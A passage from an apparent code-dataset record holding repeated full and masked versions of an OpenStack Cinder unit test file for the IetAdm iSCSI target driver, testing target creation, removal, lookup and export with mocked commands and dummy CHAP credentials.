'iqn.2010-10.org.openstack:testvol', 1, 0, self.
fake_volumes_dir, None, portals_ips=[self.configuration.
iscsi_ip_address], portals_port=int(self.configuration.
iscsi_port), check_exit_code=False, old_name=None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
def setUp(self):
super(TestIetAdmDriver, self).setUp()
self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
configuration=self.configuration)
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
<|reserved_special_token_0|>
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
@mock.patch('cinder.utils.execute')
def test_create_iscsi_target_already_exists(self, mock_execute,
mock_get_targ):
mock_execute.return_value = 'fake out', 'fake err'
self.assertEqual(1, self.target.create_iscsi_target(self.test_vol,
1, 0, self.fake_volumes_dir))
self.assertTrue(mock_get_targ.called)
self.assertTrue(mock_execute.called)
@mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
return_value=None)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.utils.execute')
def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.
testvol['name'])
mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
run_as_root=True)
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.
remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']
)
def test_find_sid_cid_for_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(('844427031282176', '0'), self.target.
_find_sid_cid_for_target('1',
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
, 'volume-83c2e877-feed-46be-8435-77884fe55b45'))
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir
)
self.target.create_iscsi_target.assert_called_once_with(
'iqn.2010-10.org.openstack:testvol', 1, 0, self.
fake_volumes_dir, None, portals_ips=[self.configuration.
iscsi_ip_address], portals_port=int(self.configuration.
iscsi_port), check_exit_code=False, old_name=None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
def setUp(self):
super(TestIetAdmDriver, self).setUp()
self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
configuration=self.configuration)
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=0)
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
@mock.patch('cinder.utils.temporary_chown')
@mock.patch.object(iet, 'LOG')
def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,
mock_execute, mock_get_targ):
mock_execute.return_value = '', ''
tmp_file = six.StringIO()
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(0, self.target.create_iscsi_target(self.
test_vol, 0, 0, self.fake_volumes_dir))
self.assertTrue(mock_execute.called)
self.assertTrue(mock_open.called)
self.assertTrue(mock_get_targ.called)
mock_open.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.
target.create_iscsi_target, self.test_vol, 0, 0, self.
fake_volumes_dir)
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.
target.create_iscsi_target, self.test_vol, 0, 0, self.
fake_volumes_dir)
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
@mock.patch('cinder.utils.execute')
def test_create_iscsi_target_already_exists(self, mock_execute,
mock_get_targ):
mock_execute.return_value = 'fake out', 'fake err'
self.assertEqual(1, self.target.create_iscsi_target(self.test_vol,
1, 0, self.fake_volumes_dir))
self.assertTrue(mock_get_targ.called)
self.assertTrue(mock_execute.called)
@mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
return_value=None)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.utils.execute')
def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.
testvol['name'])
mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
run_as_root=True)
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.
remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']
)
def test_find_sid_cid_for_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(('844427031282176', '0'), self.target.
_find_sid_cid_for_target('1',
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
, 'volume-83c2e877-feed-46be-8435-77884fe55b45'))
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir
)
self.target.create_iscsi_target.assert_called_once_with(
'iqn.2010-10.org.openstack:testvol', 1, 0, self.
fake_volumes_dir, None, portals_ips=[self.configuration.
iscsi_ip_address], portals_port=int(self.configuration.
iscsi_port), check_exit_code=False, old_name=None)
<|reserved_special_token_1|>
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
from oslo_concurrency import processutils as putils
import six
from cinder import context
from cinder import exception
from cinder.tests.unit.targets import targets_fixture as tf
from cinder import utils
from cinder.volume.targets import iet
class TestIetAdmDriver(tf.TargetDriverFixture):
def setUp(self):
super(TestIetAdmDriver, self).setUp()
self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
configuration=self.configuration)
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
'tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n' # noqa
' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n' # noqa
' cid:0 ip:10.9.8.7 state:active hd:none dd:none')
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1',
self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45' # noqa
))
# Test the failure case: Failed to handle the config file
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError,
self.target._get_target,
'')
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
return_value=0)
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
@mock.patch('cinder.utils.temporary_chown')
@mock.patch.object(iet, 'LOG')
def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,
mock_execute, mock_get_targ):
mock_execute.return_value = ('', '')
tmp_file = six.StringIO()
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(
0,
self.target.create_iscsi_target(
self.test_vol,
0,
0,
self.fake_volumes_dir))
self.assertTrue(mock_execute.called)
self.assertTrue(mock_open.called)
self.assertTrue(mock_get_targ.called)
# Test the failure case: Failed to chown the config file
mock_open.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed,
self.target.create_iscsi_target,
self.test_vol,
0,
0,
self.fake_volumes_dir)
# Test the failure case: Failed to set new auth
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed,
self.target.create_iscsi_target,
self.test_vol,
0,
0,
self.fake_volumes_dir)
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
# Test the failure case: conf file does not exist
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed,
self.target.update_config_file,
self.test_vol,
0,
self.fake_volumes_dir,
"foo bar")
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
return_value=1)
@mock.patch('cinder.utils.execute')
def test_create_iscsi_target_already_exists(self, mock_execute,
mock_get_targ):
mock_execute.return_value = ('fake out', 'fake err')
self.assertEqual(
1,
self.target.create_iscsi_target(
self.test_vol,
1,
0,
self.fake_volumes_dir))
self.assertTrue(mock_get_targ.called)
self.assertTrue(mock_execute.called)
@mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
return_value=None)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.utils.execute')
def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
# Test the normal case
self.target.remove_iscsi_target(1,
0,
self.testvol['id'],
self.testvol['name'])
mock_execute.assert_any_call('ietadm',
'--op',
'delete',
'--tid=1',
run_as_root=True)
# Test the failure case: putils.ProcessExecutionError
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetRemoveFailed,
self.target.remove_iscsi_target,
1,
0,
self.testvol['id'],
self.testvol['name'])
def test_find_sid_cid_for_target(self):
tmp_file = six.StringIO()
tmp_file.write(
'tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n' # noqa
' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n' # noqa
' cid:0 ip:10.9.8.7 state:active hd:none dd:none')
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(('844427031282176', '0'),
self.target._find_sid_cid_for_target(
'1',
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45', # noqa
'volume-83c2e877-feed-46be-8435-77884fe55b45' # noqa
))
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
return_value=1)
@mock.patch('cinder.utils.execute')
@mock.patch.object(iet.IetAdm, '_get_target_chap_auth')
def test_create_export(self, mock_get_chap, mock_execute,
mock_get_targ):
mock_execute.return_value = ('', '')
mock_get_chap.return_value = ('QZJbisGmn9AL954FNF4D',
'P68eE7u9eFqDGexd28DQ')
expected_result = {'location': '10.9.8.7:3260,1 '
'iqn.2010-10.org.openstack:testvol 0',
'auth': 'CHAP '
'QZJbisGmn9AL954FNF4D P68eE7u9eFqDGexd28DQ'}
ctxt = context.get_admin_context()
self.assertEqual(expected_result,
self.target.create_export(ctxt,
self.testvol,
self.fake_volumes_dir))
self.assertTrue(mock_execute.called)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt,
self.testvol,
self.fake_volumes_dir)
self.target.create_iscsi_target.assert_called_once_with(
'iqn.2010-10.org.openstack:testvol',
1, 0, self.fake_volumes_dir, None,
portals_ips=[self.configuration.iscsi_ip_address],
portals_port=int(self.configuration.iscsi_port),
check_exit_code=False,
old_name=None)
|
flexible
|
{
"blob_id": "932502c93dd7dfc095adfe2ab88b4404396d9845",
"index": 8680,
"step-1": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n <mask token>\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n <mask token>\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n <mask token>\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.\n testvol['name'])\n mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',\n run_as_root=True)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.\n remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']\n )\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'), self.target.\n _find_sid_cid_for_target('1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n , 'volume-83c2e877-feed-46be-8435-77884fe55b45'))\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir\n )\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol', 1, 0, self.\n fake_volumes_dir, None, portals_ips=[self.configuration.\n iscsi_ip_address], portals_port=int(self.configuration.\n iscsi_port), check_exit_code=False, old_name=None)\n",
"step-3": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n <mask token>\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n @mock.patch('cinder.utils.execute')\n def test_create_iscsi_target_already_exists(self, mock_execute,\n mock_get_targ):\n mock_execute.return_value = 'fake out', 'fake err'\n self.assertEqual(1, self.target.create_iscsi_target(self.test_vol, \n 1, 0, self.fake_volumes_dir))\n self.assertTrue(mock_get_targ.called)\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.\n testvol['name'])\n mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',\n run_as_root=True)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.\n remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']\n )\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'), self.target.\n _find_sid_cid_for_target('1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n , 'volume-83c2e877-feed-46be-8435-77884fe55b45'))\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir\n )\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol', 1, 0, self.\n fake_volumes_dir, None, portals_ips=[self.configuration.\n iscsi_ip_address], portals_port=int(self.configuration.\n iscsi_port), check_exit_code=False, old_name=None)\n",
"step-4": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=0)\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n @mock.patch('cinder.utils.temporary_chown')\n @mock.patch.object(iet, 'LOG')\n def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,\n mock_execute, mock_get_targ):\n mock_execute.return_value = '', ''\n tmp_file = six.StringIO()\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(0, self.target.create_iscsi_target(self.\n test_vol, 0, 0, self.fake_volumes_dir))\n self.assertTrue(mock_execute.called)\n self.assertTrue(mock_open.called)\n self.assertTrue(mock_get_targ.called)\n mock_open.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.\n target.create_iscsi_target, self.test_vol, 0, 0, self.\n fake_volumes_dir)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.\n target.create_iscsi_target, self.test_vol, 0, 0, self.\n fake_volumes_dir)\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n @mock.patch('cinder.utils.execute')\n def test_create_iscsi_target_already_exists(self, mock_execute,\n mock_get_targ):\n mock_execute.return_value = 'fake out', 'fake err'\n self.assertEqual(1, self.target.create_iscsi_target(self.test_vol, \n 1, 0, self.fake_volumes_dir))\n self.assertTrue(mock_get_targ.called)\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.\n testvol['name'])\n mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',\n run_as_root=True)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.\n remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']\n )\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'), self.target.\n _find_sid_cid_for_target('1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n , 'volume-83c2e877-feed-46be-8435-77884fe55b45'))\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir\n )\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol', 1, 0, self.\n fake_volumes_dir, None, portals_ips=[self.configuration.\n iscsi_ip_address], portals_port=int(self.configuration.\n iscsi_port), check_exit_code=False, old_name=None)\n",
"step-5": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\n\nimport mock\nfrom oslo_concurrency import processutils as putils\nimport six\n\nfrom cinder import context\nfrom cinder import exception\n\nfrom cinder.tests.unit.targets import targets_fixture as tf\nfrom cinder import utils\nfrom cinder.volume.targets import iet\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n 'tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\\n' # noqa\n ' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\\n' # noqa\n ' cid:0 ip:10.9.8.7 state:active hd:none dd:none')\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1',\n self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45' # noqa\n ))\n\n # Test the failure case: Failed to handle the config file\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError,\n self.target._get_target,\n '')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=0)\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n @mock.patch('cinder.utils.temporary_chown')\n @mock.patch.object(iet, 'LOG')\n def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,\n mock_execute, mock_get_targ):\n mock_execute.return_value = ('', '')\n tmp_file = six.StringIO()\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(\n 0,\n self.target.create_iscsi_target(\n self.test_vol,\n 0,\n 0,\n self.fake_volumes_dir))\n self.assertTrue(mock_execute.called)\n self.assertTrue(mock_open.called)\n 